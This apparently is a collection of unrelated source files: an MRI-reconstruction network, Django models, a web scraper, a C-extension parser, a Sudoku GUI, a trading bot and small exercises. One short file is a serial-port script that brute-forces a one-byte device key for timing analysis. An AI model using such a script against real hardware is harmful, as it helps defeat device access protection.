d_l0.append(common.DBlock_com1(conv, n_feats, n_feats, kernel_size, act=act, bn=False))
d_l1 = [common.BBlock(conv, n_feats * 4, n_feats * 2, kernel_size, act=act, bn=False)]
d_l1.append(common.DBlock_com1(conv, n_feats * 2, n_feats * 2, kernel_size, act=act, bn=False))
d_l2 = []
d_l2.append(common.BBlock(conv, n_feats * 8, n_feats * 4, kernel_size, act=act, bn=False))
d_l2.append(common.DBlock_com1(conv, n_feats * 4, n_feats * 4, kernel_size, act=act, bn=False))
pro_l3 = []
pro_l3.append(common.BBlock(conv, n_feats * 16, n_feats * 8, kernel_size, act=act, bn=False))
pro_l3.append(common.DBlock_com(conv, n_feats * 8, n_feats * 8, kernel_size, act=act, bn=False))
pro_l3.append(common.DBlock_inv(conv, n_feats * 8, n_feats * 8, kernel_size, act=act, bn=False))
pro_l3.append(common.BBlock(conv, n_feats * 8, n_feats * 16, kernel_size, act=act, bn=False))
i_l2 = [common.DBlock_inv1(conv, n_feats * 4, n_feats * 4, kernel_size, act=act, bn=False)]
i_l2.append(common.BBlock(conv, n_feats * 4, n_feats * 8, kernel_size, act=act, bn=False))
i_l1 = [common.DBlock_inv1(conv, n_feats * 2, n_feats * 2, kernel_size, act=act, bn=False)]
i_l1.append(common.BBlock(conv, n_feats * 2, n_feats * 4, kernel_size, act=act, bn=False))
i_l0 = [common.DBlock_inv1(conv, n_feats, n_feats, kernel_size, act=act, bn=False)]
m_tail = [conv(n_feats, nColor, kernel_size)]
self.head = nn.Sequential(*m_head)
self.d_l2 = nn.Sequential(*d_l2)
self.d_l1 = nn.Sequential(*d_l1)
self.d_l0 = nn.Sequential(*d_l0)
self.pro_l3 = nn.Sequential(*pro_l3)
self.i_l2 = nn.Sequential(*i_l2)
self.i_l1 = nn.Sequential(*i_l1)
self.i_l0 = nn.Sequential(*i_l0)
self.tail = nn.Sequential(*m_tail)
def forward(self, x):
x0 = self.d_l0(self.head(x))
x1 = self.d_l1(self.DWT(x0))
x2 = self.d_l2(self.DWT(x1))
#print ("forward device:",x2.device,dir(self.DWT))
x_ = self.IWT(self.pro_l3(self.DWT(x2))) + x2
x_ = self.IWT(self.i_l2(x_)) + x1
x_ = self.IWT(self.i_l1(x_)) + x0
x = self.tail(self.i_l0(x_))# + x #here commented +x since it is taken care in the calling forward method
return x
class DataConsistencyLayer(nn.Module):
def __init__(self,us_mask):
super(DataConsistencyLayer,self).__init__()
self.us_mask = us_mask
def forward(self,predicted_img,us_kspace):
# us_kspace = us_kspace[:,0,:,:]
predicted_img = predicted_img[:,0,:,:]
kspace_predicted_img = torch.rfft(predicted_img,2,True,False).double()
# print (us_kspace.shape,predicted_img.shape,kspace_predicted_img.shape,self.mask.shape)
updated_kspace1 = self.us_mask * us_kspace
updated_kspace2 = (1 - self.us_mask) * kspace_predicted_img
updated_kspace = updated_kspace1[:,0,:,:,:] + updated_kspace2
updated_img = torch.ifft(updated_kspace,2,True)
#update_img_abs = torch.sqrt(updated_img[:,:,:,0]**2 + updated_img[:,:,:,1]**2)
update_img_abs = updated_img[:,:,:,0]
update_img_abs = update_img_abs.unsqueeze(1)
return update_img_abs.float()
class DnCn(nn.Module):
def __init__(self,args,n_channels=2, nc=1, nd=5,**kwargs):
super(DnCn, self).__init__()
self.nc = nc
self.nd = nd
#print (args.usmask_path)
usmask_path = ''
us_mask_path = os.path.join(args.usmask_path,'mask_{}.npy'.format(args.acceleration_factor))
us_mask = torch.from_numpy(np.load(us_mask_path)).unsqueeze(2).unsqueeze(0).to(args.device)
#print (us_mask.device)
print('Creating D{}C{}'.format(nd, nc))
conv_blocks = []
dcs = []
checkpoint = torch.load(args.checkpoint)
#conv_layer = conv_block
#print ("DnCN --init", args.device)
for i in range(nc):
dwtunetmodel = MWCNN(args)
#print("dwtunetmodel: ",dwtunetmodel)
dwtunetmodel.load_state_dict(checkpoint['model'])
#conv_blocks.append(MWCNN(args))
conv_blocks.append(dwtunetmodel)
dcs.append(DataConsistencyLayer(us_mask))
self.conv_blocks = nn.ModuleList(conv_blocks)
self.dcs = dcs
def forward(self,x,k):
for i in range(self.nc):
x_cnn = self.conv_blocks[i](x)
x = x + x_cnn
# x = self.dcs[i].perform(x, k, m)
x = self.dcs[i](x,k)
return x
|
998,147 | 0d1e3fb200d496d9e8c1ef27962e3e7478a647fc | from django.db import models
from django.contrib import admin
class Cursos(models.Model):
nombrecurso = models.CharField(max_length=30)
def __str__(self):
return self.nombrecurso
class Alumnos(models.Model):
nombrealumno = models.CharField(max_length=60)
calificaciones = models.TextField()
Curso = models.ManyToManyField(Cursos, through='Boleta')
def __str__(self):
return self.nombrecurso
class Boleta(models.Model):
curso = models.ForeignKey(Cursos, on_delete=models.CASCADE)
alumno = models.ForeignKey(Alumnos, on_delete=models.CASCADE)
class NotasInLine(admin.TabularInline):
model = Boleta
extra = 1
class CursosAdmin(admin.ModelAdmin):
inlines = (NotasInLine,)
class AlumnosAdmin (admin.ModelAdmin):
inlines = (NotasInLine,)
|
998,148 | 8e35544a47ff3ac3482b3c80c8ff0f8d45d3814c | from serial import Serial
from time import sleep
''' 1) Try crack single byte. Run logic for ~300 sec '''
''' 2) Save logic to CSV file (this directory) '''
''' 3) Run read_csv.py to display time '''
ser = Serial('COM3', 9600)
ser.close()
for key in range(255, 0, -1):
ser.open()
sleep(0.02)
# send 16 zeros
for _ in range(16):
ser.write(b'\x00')
sleep(0.03)
# header
ser.write(b'\xf5')
ser.write(b'\xdf')
ser.write(b'\xff')
ser.write(b'\x00')
ser.write(b'\x07')
# key
ser.write(bytes([key]))
ser.write(b'\xff')
ser.write(b'\xff')
ser.write(b'\xff')
ser.write(b'\xff')
ser.write(b'\xff')
ser.write(b'\xff')
# read
ser.write(b'\x70')
ser.flush()
sleep(0.02)
ser.close()
|
998,149 | 89c63ef05ceaea4950443e6ac67a1785c6a4c033 | # Author: Zsolt Kébel
# Date: 18/11/2020
file = open("text.txt")
swFile = open("sensitive_words.txt")
text = file.read()
sensitiveWords = swFile.readlines()
newText = ""
for sensitiveWord in sensitiveWords:
newText = text.replace(sensitiveWord, "*")
print(newText)
file.close()
swFile.close()
|
998,150 | 539a0b290cd374d822e9d0d576596ecb96e496d9 | # -*- coding: utf-8 -*-
import scrapy
from datetime import datetime
from papermedia.items import ScienceAdvancesItem
from scrapy.http import Request
class ScienceAdvancesSpider(scrapy.Spider):
name = "scienceadvances"
# allowed_domains = ["advances.sciencemag.org"]
__url_root = 'http://advances.sciencemag.org'
def start_requests(self):
vol = datetime.now().year - 2014
issue = datetime.now().month - 1
self.__vol_issue = 'VOL {}, ISSUE {}'.format(vol, issue)
link = self.__url_root + '/content/{}/{}'.format(vol, issue)
yield self.make_requests_from_url(link)
def parse(self, response):
subject_nodes = response.xpath('//li[@class="issue-toc-section issue-toc-section-contents"]'
+ '/ul[@class="toc-section item-list"]/li')
for subject_node in subject_nodes:
subject = subject_node.xpath('./h2').extract()[0]
item_nodes = subject_node.xpath('./ul[@class="toc-section item-list"]/li')
for item_node in item_nodes:
item = ScienceAdvancesItem(
publication_date=item_node.xpath(
'.//p[@class="highwire-cite-metadata byline"]/time/text()').extract(),
vol_issue=self.__vol_issue,
subject=subject,
title=item_node.xpath(
'.//div[@class="highwire-cite-title media__headline__title"]'
+ '|.//div[@class="highwire-cite-subtitle media__headline__subtitle"]').extract(),
contributors=item_node.xpath(
'.//span[@class="highwire-citation-authors"]/span/text()').extract()
)
yield Request(self.__url_root + self.get_links(item_node).pop('full'),
callback=self.parse_article,
meta={'science_journal_item': item})
def parse_article(self, response):
item = response.meta['science_journal_item']
full_text_node = response.xpath('//div[@class="article fulltext-view "]')
item['abstract'] = full_text_node.xpath('./div[@class="section abstract"]').extract()
item['keywords'] = full_text_node.xpath('./ul[@class="kwd-group"]/li[@class="kwd"]/text()').extract()
item['references_and_notes'] = full_text_node.xpath('./div[@class="section ref-list"]'
+ '/ol/li//div[@class="cit-metadata"]').extract()
item['acknowledgments'] = full_text_node.xpath('./div[@class="ack"]').extract()
item['content'] = full_text_node.xpath('./*[not(@class="section abstract"'
+ ' or @class="kwd-group"'
+ ' or @class="section ref-list"'
+ ' or @class="ack"'
+ ')]').extract()
return item
@staticmethod
def get_links(item_node):
links = item_node.xpath('.//ul[@class="variant-list media__links"]/li/a/@href').extract()
result = {}
for link in links:
method_key = link.split('.').pop()
result[method_key] = link
return result
|
998,151 | 04d6e322ce254ac6a9cfa5b21f6d94beddba571b | import os
import subprocess
from weakref import ref
from lib import pyjack
import pyrser
from pyrser import meta
from pyrser.grammar import Grammar
from cnorm.parsing.declaration import Declaration
from cnorm.parsing.expression import Expression
from cnorm import nodes
from kooc_nodes import Import
from kooc_nodes import Module
from kooc_nodes import Implem
from kooc_nodes import Bracket
class Parser(Grammar, Declaration):
entry = 'translation_unit'
grammar = """
translation_unit =
[
@ignore("C/C++")
[
__scope__:current_block
#new_root(_, current_block)
[
#tryInit(_)
"@import" Base.string:n #importKoocFile(_, n) |
[ "@module" Base.id:n #createModule(_, n, current_block) | "@implementation" Base.id:n #createImplem(_, n, current_block) ]
'{' [ Declaration.declaration #saveDecl(_, current_block) ]* '}' #stopSavingDecls(current_block) |
Declaration.declaration
]*
]
Base.eof
]
primary_expression =
[
'(' expression:expr ')' #new_paren(_, expr)
| [ Literal.literal | identifier ]:>_
| bracket:>_
]
bracket = [ [ type_specifier:>_ ]? '[' identifier:m ['.'?]:s identifier:n #createBracket(_, m, s, n) [ ':' assignement_expression:p #saveParam(_, p) ]* ']' ]
type_specifier = [ "@!(" type_name:>_ ')' ]
"""
def init(self, filename):
array = filename.split('/')
self.tmp_filename = '/tmp/kooc-' + array[len(array) - 1]
tmp_file = open(self.tmp_filename, 'w')
completedProcess = subprocess.run(['/usr/bin/cpp', filename], stdout = tmp_file)
tmp_file.close()
completedProcess.check_returncode()
def delete(self):
os.remove(self.tmp_filename)
def parse(self):
self.AST = self.parse_file(self.tmp_filename)
def buildSymTables(self):
if not hasattr(self.AST, 'symTable'):
self.AST.symTable = {}
for item in self.AST.body:
if isinstance(item, nodes.Decl) and item._ctype._storage != nodes.Storages.TYPEDEF:
self.AST.symTable[item._name] = item._ctype
if hasattr(item, 'body'):
self.paramList = item._ctype._params
self.buildLocalSymTables(item.body.body)
for _,moduleRef in self.AST.modules.items():
for _,declList in moduleRef().declarations.items():
for ctype,mangledName in declList:
self.AST.symTable[mangledName] = ctype
for _,decl in moduleRef().definitions.items():
if hasattr(decl, 'body'):
self.paramList = decl._ctype._params
self.privDecls = moduleRef().privateDeclarations
self.buildLocalSymTables(decl.body.body)
def buildLocalSymTables(self, curItem):
declList = []
bracketList = []
if isinstance(curItem, Bracket):
bracketList.append(curItem)
if not curItem.isVar:
for item in curItem.params:
bracketList.extend(self.buildLocalSymTables(item))
elif isinstance(curItem, list):
for item in curItem:
if isinstance(item, nodes.Decl):
declList.append(item)
else:
bracketList.extend(self.buildLocalSymTables(item))
elif hasattr(curItem, '__dict__') and len(curItem.__dict__):
for _,item in curItem.__dict__.items():
bracketList.extend(self.buildLocalSymTables(item))
for bracket in bracketList:
for decl in declList:
if decl._name not in bracket.symTable:
bracket.symTable[decl._name] = decl._ctype
for decl in self.paramList:
bracket.symTable[decl._name] = decl._ctype
if hasattr(self, 'privDecls'):
for _,decls in self.privDecls.items():
for ctype,mangledName in decls:
bracket.symTable[mangledName] = ctype
return bracketList
def saveBracketsExprRef(self):
for item in self.AST.body:
if isinstance(item, Implem):
for _,definition in item.moduleRef().definitions.items():
startNodes = []
if hasattr(definition, 'body'):
for attr in definition.body.body:
startNodes.extend(self.getStartNodes(attr))
for node in startNodes:
if isinstance(node, nodes.Return):
self.ret = definition._ctype
bracketRef = self.getShallowest(self.findBracket(node, None, 0))[1]
if hasattr(self, 'ret'):
delattr(self, 'ret')
if bracketRef is not None and (len(self.AST.brackets) == 0 or bracketRef() is not self.AST.brackets[len(self.AST.brackets) - 1]()):
self.AST.brackets.append(bracketRef)
elif isinstance(item, nodes.Decl) and hasattr(item, 'body'):
startNodes = []
for attr in item.body.body:
startNodes.extend(self.getStartNodes(attr))
for node in startNodes:
if isinstance(node, nodes.Return):
self.ret = item._ctype
bracketRef = self.getShallowest(self.findBracket(node, None, 0))[1]
if bracketRef is not None and (len(self.AST.brackets) == 0 or bracketRef() is not self.AST.brackets[len(self.AST.brackets) - 1]()):
self.AST.brackets.append(bracketRef)
def getStartNodes(self, curItem):
startNodes = []
if isinstance(curItem, nodes.Decl) or isinstance(curItem, nodes.ExprStmt) or isinstance(curItem, nodes.Return) or isinstance(curItem, nodes.Unary):
startNodes.append(curItem)
elif isinstance(curItem, nodes.BlockStmt):
for item in curItem.body:
startNodes.extend(self.getStartNodes(item))
elif isinstance(curItem, nodes.Do) or isinstance(curItem, nodes.Switch) or isinstance(curItem, nodes.While):
startNodes.append(curItem)
startNodes.extend(self.getStartNodes(curItem.body))
elif isinstance(curItem, nodes.If):
startNodes.append(curItem)
startNodes.extend(self.getStartNodes(curItem.elsecond))
startNodes.extend(self.getStartNodes(curItem.thencond))
elif isinstance(curItem, nodes.For):
startNodes.extend(self.getStartNodes(curItem.body))
startNodes.extend(self.getStartNodes(curItem.condition))
startNodes.extend(self.getStartNodes(curItem.increment))
startNodes.extend(self.getStartNodes(curItem.init))
return startNodes
def findBracket(self, attr, parentAttr, depth):
for _,subAttr in attr.__dict__.items():
if isinstance(subAttr, Bracket):
if hasattr(self, 'ret'):
subAttr.ret = self.ret
delattr(self, 'ret')
yield (depth, ref(attr))
elif isinstance(subAttr, pyrser.parsing.node.Node):
yield self.getShallowest(self.findBracket(subAttr, attr, depth + 1))
elif isinstance(subAttr, list): # and len(subAttr)
for i in range(len(subAttr)):
if isinstance(subAttr[i], Bracket):
yield (depth, ref(attr))
else:
yield self.getShallowest(self.findBracket(subAttr[i], attr, depth + 1))
else:
yield (-1, None)
def getShallowest(self, gen):
minDepth = -1
shallowParentRef = None
for depth,parentRef in gen:
if depth != -1 and (minDepth == -1 or depth < minDepth):
minDepth = depth
shallowParentRef = parentRef
return (minDepth, shallowParentRef)
@meta.hook(Parser)
def tryInit(self, root):
self.root = root
if hasattr(self, 'imports') and hasattr(self, 'modules') and hasattr(self, 'implems'):
root.imports = self.imports
root.modules = self.modules
root.implems = self.implems
root.types = self.types
delattr(self, 'imports')
delattr(self, 'modules')
delattr(self, 'implems')
delattr(self, 'types')
if not hasattr(root, 'imports'):
root.imports = {}
if not hasattr(root, 'modules'):
root.modules = {}
if not hasattr(root, 'implems'):
root.implems = {}
if not hasattr(root, 'brackets'):
root.brackets = []
return True
@meta.hook(Parser)
def importKoocFile(self, root, filename):
filename = self.value(filename)[1:len(self.value(filename))-1]
if not filename in root.imports:
root.imports[filename] = None
parser = Parser()
parser.init(filename)
parser.imports = root.imports
parser.modules = root.modules
parser.implems = root.implems
parser.types = root.types
parser.parse()
parser.buildSymTables()
parser.saveBracketsExprRef()
importNode = Import(filename, parser.AST)
parser.delete()
root.imports.update({ k:v for k,v in importNode.imports.items() if k not in root.imports })
root.modules.update({ k:v for k,v in importNode.modules.items() if k not in root.modules })
root.implems.update({ k:v for k,v in importNode.implems.items() if k not in root.implems })
root.brackets.extend(importNode.brackets)
if not hasattr(root, 'symTable'):
root.symTable = {}
root.symTable.update(importNode.symTable)
root.types = importNode.types
delattr(importNode, 'imports')
delattr(importNode, 'modules')
delattr(importNode, 'implems')
delattr(importNode, 'brackets')
delattr(importNode, 'types')
root.body.append(importNode)
root.imports[filename] = ref(importNode)
return True
# @module handling
@meta.hook(Parser)
def createModule(self, root, name, current_block):
name = self.value(name)
if name in root.modules.items():
print('error: module or class "' + name + '" has already been declared')
return False
moduleNode = Module(name, root.body, len(root.body))
root.body.append(moduleNode)
root.modules[name] = ref(moduleNode)
current_block.nextDeclLoc = ref(moduleNode)
return True
# @implementation handling
@meta.hook(Parser)
def createImplem(self, root, name, current_block):
name = self.value(name)
moduleRef = root.modules.get(name)
if moduleRef is None:
print('error: module or class "' + name + '" has not been declared')
return False
if not name in root.implems.items():
implemNode = Implem(name, moduleRef, root.body, len(root.body))
root.body.append(implemNode)
root.implems[name] = ref(implemNode)
current_block.nextDefLoc = moduleRef
return True
# save @{module,implem} content
@meta.hook(Parser)
def saveDecl(self, root, current_block):
if hasattr(current_block, 'nextDeclLoc') and current_block.nextDeclLoc is not None:
current_block.nextDeclLoc().saveDeclaration(root.body.pop())
elif hasattr(current_block, 'nextDefLoc') and current_block.nextDefLoc is not None:
current_block.nextDefLoc().saveDefinition(root.body.pop())
return True
@meta.hook(Parser)
def stopSavingDecls(self, current_block):
current_block.nextDeclLoc = None
current_block.nextDefLoc = None
return True
# Brackets handling
@meta.hook(Parser)
def createBracket(self, node, module, separator, name):
pyjack.replace_all_refs(node, Bracket(self.value(module), self.value(name), self.value(separator) == '.', node, self.root.modules))
return True
@meta.hook(Parser)
def saveParam(self, bracketNode, param):
bracketNode.addParam(param)
return True
|
998,152 | 678c69e0de709884695b9acf4aad4a310b6cba4c | import streamlit as st
import pandas as pd
import numpy as np
from openpyxl import Workbook, load_workbook
import SessionState
"""
This function takes in a dataframe and returns a dictionary with the topic title as key and the leading comment as value
"""
#@st.cache(suppress_st_warning=True, allow_output_mutation=True) # This function will be cashed and won't be run again
def load_data(unlabeled_data):
def get_data_from_file(df):
dic = {}
for row in range(len(df)):
dic[df['Topic Title'].iloc[row]] = df['Leading Comment'].iloc[row]
return dic
"""
These two statements read in our desired csv files. The first one reads in the file that contains all redefined TagNames, which we have to make ourselves. The second contains scrapped data.
"""
#df_all_tag = pd.read_csv("FileWithAllTagName.csv")
df_posts = pd.read_csv(unlabeled_data)
#new_labeled_topics: is the dataframe where we store labeled data
new_labeled_topics = df_posts.copy()
#data_dic: contains the the scrapped data: with the topic title as key and the leading comment as value
data_dic = get_data_from_file(df_posts)
#iterate_key: an iterater that goes to the next topic when called next(iterate_key)
iterate_key = iter(data_dic.keys())
#curr_key: the tracker that keeps track of the current topic title that we are on
curr_key = next(iterate_key)
return data_dic, iterate_key, curr_key
"""
Below is mainly code for StreamLit display.
"""
st.write("""
** ML July Team1 Manual Tagging App**
""")
#the line below is for the drop down menu for tag selection. We will switch df_posts with df_all_tag.
data_dic, iterate_key, curr_key = load_data("StackOverflow_new_tags.csv")
#importing tags list
df_tags = pd.read_csv("Tags.csv")
tags_list = df_tags.Tags.tolist()
#remove the tagged post from the dataset and reset
if st.button("Reset"):
df_posts = pd.read_csv("StackOverflow_new_tags.csv")
df_posts = df_posts.iloc[1:]
df_posts.to_csv("StackOverflow_new_tags.csv")
#displays next topic
session = SessionState.get(run_id=0)
if st.button("Next Topic"):
session.run_id += 1
options = st.multiselect('Please select suitable tags for the following topic.', tags_list, key=session.run_id)
st.write('You selected:', options)
st.write("Topic Title:")
st.write(curr_key)
st.write("Leading Comment:")
st.write(data_dic[curr_key])
#writes the tagged post to a excel file
if st.button("Submit"):
df = pd.read_csv('LabeledData.csv')
row_to_append = pd.DataFrame({df.columns[0]: [curr_key], df.columns[1]: [data_dic[curr_key]], df.columns[2]: [options]})
df = df.append(row_to_append)
df.to_csv('LabeledData.csv', index=False)
|
998,153 | 9fa63b60043d5684455ac79c54e332daaf490778 | # Tentamen versie :BMFWRDZN
# Gegevens :Reuben Domacasse 0918901 23-10-2017
# Opgave :1-001
# Inleiding: De inhoud van een voorwerp met een diameter van 33 cm wordt berekend met de formule: 1/8 x 3,14 x (33^4) / 5
# Opdracht: Schrijf een programma dat deze berekening uitvoert.
# Eisen: Vervang de getallen door variabelen.
# De uitkomst wordt op het scherm geprint met de zin: "De inhoud van de bol is x kubieke cm"
# Waarbij x de uitkomst is van de berekening
# Programma: DIAMETER BEREKENEN
#defineer variable pi
pi = float(3.14)
#defineer variable diameter
diameter = (33**4)/5
#defineer variable hoogte
hoogte = 1/8
#defineer variable x
x = str(float(hoogte*pi*diameter))
#print het resultaat van de formule met variable x
print ("De inhoud van de bol is "+x+" kubieke cm.") |
998,154 | 534489e080080c32d8e77c3c74435cdeeb523ece | # Ejercicio propuesto por Guillermo Cirer
# Lesson 2: Problem set (Optional 2)
# Superhero Nuisance
# Enunciado del ejercicio:
# Write a Python procedure fix_machine to take 2 string inputs
# and returns the 2nd input string as the output if all of its
# characters can be found in the 1st input string and "Give me
# something that's not useless next time." if it's impossible.
# Letters that are present in the 1st input string may be used
# as many times as necessary to create the 2nd string (you
# don't need to keep track of repeat usage).
def fix_machine(escombros, producto):
escombros = str(escombros)
producto = str(producto)
Faltan_Caracteres = False
for caracter in producto:
if escombros.find(caracter) == -1:
Faltan_Caracteres = True
return "Give me something that's not useless next time."
if not Faltan_Caracteres:
return producto
# TEST CASES funcion fix_machine:
print("Otro tipo de test", fix_machine(12,"1"))
print("Otro tipo de test", fix_machine('skgdhaa','hada'))
print("Test case 1: ", fix_machine('UdaciousUdacitee', 'Udacity') == "Give me something that's not useless next time.")
print("Test case 2: ", fix_machine('buy me dat Unicorn', 'Udacity') == 'Udacity')
print("Test case 3: ", fix_machine('AEIOU and sometimes y... c', 'Udacity') == 'Udacity')
print("Test case 4: ", fix_machine('wsx0-=mttrhix', 't-shirt') == 't-shirt')
print("Test case 5: ", fix_machine('matrix reloaded', 'dedo mixta lordo') == 'dedo mixta lordo')
|
998,155 | 6d55d42180b146cae6ab59196feab66f56fe912b | from lib.util import BaseAPIView
from rest_framework.views import APIView
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from rest_framework import status
from Apps.fcb.models import *
from rest_framework.generics import ListAPIView
from Apps.fcb.serializers import PlayerListSerializer
class RetriveNews(APIView, BaseAPIView):
permission_classes = (AllowAny,)
def get(self, request):
try:
news_type = request.GET.get('type',None)
news =[]
index = -1
type = News._meta.get_field('type').choices
for item in type:
if item[1]==news_type:
index=item[0]
if index>0:
for item in News.objects.filter(type=index):
news.append({
'title':item.title,
'large_img': item.large_img.url,
'small_img': item.small_img.url,
'source':item.source,
'content':item.content,
})
self.response.data=news
self.response.status_code=200
return Response(self.response.as_dict(), headers={'Access-Control-Allow-Origin': '*'},status=status.HTTP_200_OK)
except Exception as e:
return Response(status=status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)
class RetrivePlayerList(ListAPIView):
permission_classes = (AllowAny,)
serializer_class = PlayerListSerializer
queryset = Player.objects.all()
|
998,156 | b965383e225fd381da63b82edf80d981c0da7e96 | import sys
import socket
import json
"""
Method evaluates bond order based on price. Returns a json
order to execute
"""
def evaluate_bond_order(book, order_id, positions):
if book['BOND'][0] == 0:
return {"type": "add", "order_id": order_id, "symbol": "BOND", "dir": "BUY", "price": 999, "size": 1}
if book['BOND'][1] == 0:
return {"type": "add", "order_id": order_id, "symbol": "BOND", "dir": "BUY", "price": 1001, "size": 1}
buy_price = book['BOND'][0][0]
sell_price = book['BOND'][1][0]
book_buy_size, book_sale_size = calculate_positions(positions)
if sell_price > 1000:
return {"type": "add", "order_id": order_id, "symbol": "BOND", "dir": "SELL", "price": sell_price, "size": 1}
if buy_price < 1000:
return {"type": "add", "order_id": order_id, "symbol": "BOND", "dir": "BUY", "price": buy_price, "size": 1}
else:
return None
def balance_fill(book,fmv_book, fill_order, order_id):
security_order = fill_order["symbol"]
if security_order == "BOND":
if fill_order["dir"] == "BUY":
return {"type": "add", "order_id": order_id, "symbol": "BOND", "dir": "SELL", "price": 1001, "size": fill_order["size"]}
else:
return {"type": "add", "order_id": order_id, "symbol": "BOND", "dir": "BUY", "price": 999, "size": fill_order["size"]}
else:
fmv_price = fmv_book[security_order][1]
# spread = (book[security_order][1][0] - book[security_order][0][0]) // 2
if fill_order["dir"] == "BUY":
return {"type": "add", "order_id": order_id, "symbol": security_order, "dir": "SELL", "price": fmv_price + 1, "size": fill_order["size"]}
else:
return {"type": "add", "order_id": order_id, "symbol": security_order, "dir": "BUY", "price": fmv_price - 1, "size": fill_order["size"]}
def calculate_positions(positions):
if positions["BOND"] == 0:
return 100, 100
else:
if positions["BOND"] > 0:
return 0, positions["BOND"]
else:
return positions["BOND"], 0
|
998,157 | 15464512d5e19f604ddb0db052047993c5df079a | from tkinter import Tk, Canvas, Frame, Button, BOTH, TOP, BOTTOM, LEFT, RIGHT, Label
import copy
from gameAI import Game_Solver
from sudokuGenerator import generate
MARGIN = 80
SIDE = 120
WIDTH = HEIGHT = MARGIN * 2 + SIDE * 9
LEVEL = "Easy"
class SudokuUI(Frame):
"""
"""
def __init__(self, parent, game):
self.game = game
self.parent = parent
Frame.__init__(self, parent)
self.row = 0
self.col = 0
self.level = None
self.__initUI()
def __initUI(self):
"""
"""
self.parent.title("Sudoku")
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, bg = "white" , width = WIDTH, height = HEIGHT)
self.canvas.pack(fill=BOTH, side=TOP)
clear_button = Button(self,
text="Clear answers",
height = HEIGHT // 15,
font = ("Monaco", HEIGHT // 62),
command=self.__clear_answers)
solver_button = Button(self,
text = "Solve Puzzle",
height = HEIGHT // 15,
font = ("Monaco", HEIGHT // 62),
command=self.__solve_puzzle
)
New_Label = Label(self, text = "New Puzzle : ", font = ("Monaco, 20"))
easy_button = Button(self, text = "Easy", font = ("Monaco", 20), command = self.__easy_clicked)
medium_button = Button(self, text = "Medium", font = ("Monaco", 20), command = self.__medium_clicked)
hard_button = Button(self, text = "Hard", font = ("Monaco", 20), command = self.__hard_clicked)
insane_button = Button(self, text = "Insane", font = ("Monaco", 20), command = self.__insane_clicked)
clear_button.pack(side = LEFT)
solver_button.pack(side = LEFT)
insane_button.pack(side = RIGHT)
hard_button.pack(side = RIGHT)
medium_button.pack(side = RIGHT)
easy_button.pack(side = RIGHT)
New_Label.pack(side = RIGHT)
self.__draw_grid()
self.__draw_puzzle()
# self.cell_click and self.key_pressed is a callback function , much like JS
self.canvas.bind("<Button-1>", self.__cell_clicked)
self.canvas.bind("<Key>", self.__key_pressed)
def fresh_start(self):
"""
"""
self.__clear_answers()
fresh_board = generate(self.level)
self.game.start_puzzle = copy.deepcopy(fresh_board)
self.game.puzzle = fresh_board
self.__draw_puzzle()
def __easy_clicked(self):
"""
"""
self.level = "Easy"
self.fresh_start()
def __medium_clicked(self):
"""
"""
self.level = "Medium"
self.fresh_start()
def __hard_clicked(self):
"""
"""
self.level = "Hard"
self.fresh_start()
def __insane_clicked(self):
"""
"""
self.level = "Insane"
self.fresh_start()
def __draw_grid(self):
"""
"""
for i in range(10):
if i % 3 == 0:
color = "blue"
else:
color = "grey"
x0 = MARGIN + i * SIDE
y0 = MARGIN
x1 = MARGIN + i * SIDE
y1 = WIDTH - MARGIN
self.canvas.create_line(x0, y0, x1, y1, fill=color)
y0 = MARGIN + i * SIDE
x0 = MARGIN
y1 = MARGIN + i * SIDE
x1 = WIDTH - MARGIN
self.canvas.create_line(x0, y0, x1, y1, fill=color)
def __draw_puzzle(self):
"""
"""
self.canvas.delete("numbers")
for i in range(9):
for j in range(9):
answer = self.game.puzzle[i][j]
if answer != 0:
x = MARGIN + j * SIDE + SIDE / 2
y = MARGIN + i * SIDE + SIDE / 2
original = self.game.start_puzzle[i][j]
if answer == original:
color = "red"
else:
color = "dark green"
self.canvas.create_text(x, y, text=answer, tags="numbers", fill = color, font = ("Monaco", 25))
def __clear_answers(self):
"""
"""
self.game.start()
self.canvas.delete("victory")
self.canvas.delete("winner")
self.__draw_puzzle()
def __cell_clicked(self, event):
"""
"""
if self.game.game_over:
return
# Event class gives us current x and current ys
x = event.x
y = event.y
if(MARGIN < x < WIDTH - MARGIN and MARGIN < y < HEIGHT - MARGIN):
self.canvas.focus_set()
# Get row and column from x , y coordinates
row = (y - MARGIN) // SIDE
col = (x - MARGIN) // SIDE
# if cell was selected already - deselect it
if (row, col) == (self.row, self.col):
self.row, self.col = -1, -1
elif self.game.puzzle[row][col] == 0:
self.row, self.col = row, col
self.__draw_cursor()
def __draw_cursor(self):
"""
"""
self.canvas.delete("cursor")
if self.row >= 0 and self.col >= 0:
x0 = MARGIN + self.col * SIDE + 1
y0 = MARGIN + self.row * SIDE + 1
x1 = MARGIN + (self.col + 1) * SIDE - 1
y1 = MARGIN + (self.row + 1) * SIDE - 1
self.canvas.create_rectangle(
x0, y0, x1, y1,
outline="red", tags="cursor"
)
def __key_pressed(self, event):
"""
"""
if self.game.game_over:
return
if self.row >= 0 and self.col >= 0 and event.char in "1234567890":
self.game.puzzle[self.row][self.col] = int(event.char)
self.col = -1
self.row = -1
self.__draw_puzzle()
self.__draw_cursor()
if self.game.check_win():
self.__draw_victory()
def __draw_victory(self):
"""
"""
x0 = y0 = MARGIN + SIDE * 2
x1 = y1 = MARGIN + SIDE * 7
self.canvas.create_oval(
x0, y0, x1, y1,
tags="victory", fill="dark orange", outline="orange"
)
# create text
x = y = MARGIN + 4 * SIDE + SIDE / 2
self.canvas.create_text(
x, y,
text="You win!", tags="winner",
fill="white", font=("Arial", 32)
)
def __solve_puzzle(self):
"""
"""
self.__clear_answers()
solver = Game_Solver(self.game.puzzle)
solver.print_board(self.game.puzzle)
solver.solve(self.game.puzzle)
print("___________________")
solver.print_board(self.game.puzzle)
self.__draw_puzzle()
def return_level(self):
return self.level |
998,158 | 156942020e684d80daf56ef5041d235ef4c0fdda | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2016-11-22 01:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rescuteApp', '0003_report_location'),
]
operations = [
migrations.AddField(
model_name='report',
name='additional_comments',
field=models.CharField(default='', max_length=1000),
),
]
|
998,159 | 29970f43d3f01729f71097b37b6c9eb300f55abc | # Import necessary modules
from flask import Flask, request
import pickle
import pandas as pd
app = Flask(__name__)
with open('xgb_model_new','rb') as m:
model = pickle.load(m)
